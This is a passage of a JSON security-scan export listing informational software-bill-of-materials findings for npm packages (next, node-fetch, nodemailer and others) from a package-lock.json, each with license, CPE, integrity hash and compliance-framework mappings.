"tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "932afc2de4b38fa5", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: negotiator 0.6.3", "title": "negotiator 0.6.3", "description": "Package discovered: negotiator 0.6.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "312bd96694b2eb5b", "name": "negotiator", "version": "0.6.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:negotiator:negotiator:0.6.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/negotiator@0.6.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/negotiator/-/negotiator-0.6.3.tgz", "integrity": "sha512-+EUsqGPLsM+j/zdChZjsnX51g4XrHFOIXwfnCVPGlQk/k5giakcKsuxCObBRu6DSm9opw/O6slWbJdghQM4bBg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "d346e21d42fdf73e", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: next 14.2.3", "title": "next 14.2.3", "description": "Package discovered: next 14.2.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "a9792237818f8415", "name": "next", "version": "14.2.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:vercel:next.js:14.2.3:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/next@14.2.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/next/-/next-14.2.3.tgz", "integrity": "sha512-dowFkFTR8v79NPJO4QsBUtxv0g9BrS/phluVpMAt2ku7H+cbcBJlopXjkWlwxrk/xGqMemr7JkGPGemPrLLX7A==", "dependencies": { "@next/env": "14.2.3", "@swc/helpers": "0.5.5", "busboy": "1.6.0", "caniuse-lite": "^1.0.30001579", "graceful-fs": "^4.2.11", "postcss": "8.4.31", "styled-jsx": "5.1.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "35dad46b81d74be4", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: node-cron 3.0.3", "title": "node-cron 3.0.3", "description": "Package discovered: node-cron 3.0.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "5c4492e68f441264", "name": "node-cron", "version": "3.0.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:node-cron:node-cron:3.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:node-cron:node_cron:3.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:node_cron:node-cron:3.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:node_cron:node_cron:3.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:node:node-cron:3.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:node:node_cron:3.0.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/node-cron@3.0.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/node-cron/-/node-cron-3.0.3.tgz", "integrity": "sha512-dOal67//nohNgYWb+nWmg5dkFdIwDm8EpeGYMekPMrngV3637lqnX0lbUcCtgibHTz6SEz7DAIjKvKDFYCnO1A==", "dependencies": { "uuid": "8.3.2" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "5d72f54e4946a64f", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: node-fetch 2.7.0", "title": "node-fetch 2.7.0", "description": "Package discovered: node-fetch 2.7.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "71294da0e67ef2a3", "name": "node-fetch", "version": "2.7.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:node-fetch_project:node-fetch:2.7.0:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/node-fetch@2.7.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.7.0.tgz", "integrity": "sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A==", "dependencies": { "whatwg-url": "^5.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "2cbaa504cc478c46", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: node-forge 1.4.0", "title": "node-forge 1.4.0", "description": "Package discovered: node-forge 1.4.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "c1e5f20287afef44", "name": "node-forge", "version": "1.4.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "(BSD-3-Clause OR GPL-2.0)", "spdxExpression": "(BSD-3-Clause OR GPL-2.0)", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:digitalbazaar:forge:1.4.0:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/node-forge@1.4.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/node-forge/-/node-forge-1.4.0.tgz", "integrity": "sha512-LarFH0+6VfriEhqMMcLX2F7SwSXeWwnEAJEsYm5QKWchiVYVvJyV9v7UDvUv+w5HO23ZpQTXDv/GxdDdMyOuoQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "c9ae4bba0c53507d", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: node-releases 2.0.38", "title": "node-releases 2.0.38", "description": "Package discovered: node-releases 2.0.38", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "157e4f935702d7be", "name": "node-releases", "version": "2.0.38", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:node-releases:node-releases:2.0.38:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:node-releases:node_releases:2.0.38:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:node_releases:node-releases:2.0.38:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:node_releases:node_releases:2.0.38:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:node:node-releases:2.0.38:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:node:node_releases:2.0.38:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/node-releases@2.0.38", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.38.tgz", "integrity": "sha512-3qT/88Y3FbH/Kx4szpQQ4HzUbVrHPKTLVpVocKiLfoYvw9XSGOX2FmD2d6DrXbVYyAQTF2HeF6My8jmzx7/CRw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "b468b7afcd57f5e8", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: nodemailer 6.10.1", "title": "nodemailer 6.10.1", "description": "Package discovered: nodemailer 6.10.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "bdc7a63994d0b28a", "name": "nodemailer", "version": "6.10.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT-0", "spdxExpression": "MIT-0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:nodemailer:nodemailer:6.10.1:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/nodemailer@6.10.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/nodemailer/-/nodemailer-6.10.1.tgz", "integrity": "sha512-Z+iLaBGVaSjbIzQ4pX6XV41HrooLsQ10ZWPUehGmuantvzWoDVBnmsdUcOIDM1t+yPor5pDhVlDESgOMEGxhHA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "eca5920a6d6c920a", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: nopt 7.2.1", "title": "nopt 7.2.1", "description": "Package discovered: nopt 7.2.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "47f001cd3ecd3ee8", "name": "nopt", "version": "7.2.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:nopt:nopt:7.2.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/nopt@7.2.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/nopt/-/nopt-7.2.1.tgz", "integrity": "sha512-taM24ViiimT/XntxbPyJQzCG+p4EKOpgD3mxFwW38mGjVUrfERQOeY4EDHjdnptttfHuHQXFx+lTP08Q+mLa/w==", "dependencies": { "abbrev": "^2.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "b6fa9eec1e273eef", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: normalize-path 3.0.0", "title": "normalize-path 3.0.0", "description": "Package discovered: normalize-path 3.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "86c9c8fe4da1b72f", "name": "normalize-path", "version": "3.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:normalize-path:normalize-path:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:normalize-path:normalize_path:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:normalize_path:normalize-path:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:normalize_path:normalize_path:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:normalize:normalize-path:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:normalize:normalize_path:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/normalize-path@3.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "0c9db30b81ebd770", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: normalize-svg-path 1.1.0", "title": "normalize-svg-path 1.1.0", "description": "Package discovered: normalize-svg-path 1.1.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "2e420341fd4164af", "name": "normalize-svg-path", "version": "1.1.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:normalize-svg-path:normalize-svg-path:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:normalize-svg-path:normalize_svg_path:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:normalize_svg_path:normalize-svg-path:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:normalize_svg_path:normalize_svg_path:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:normalize-svg:normalize-svg-path:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:normalize-svg:normalize_svg_path:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:normalize_svg:normalize-svg-path:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:normalize_svg:normalize_svg_path:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": 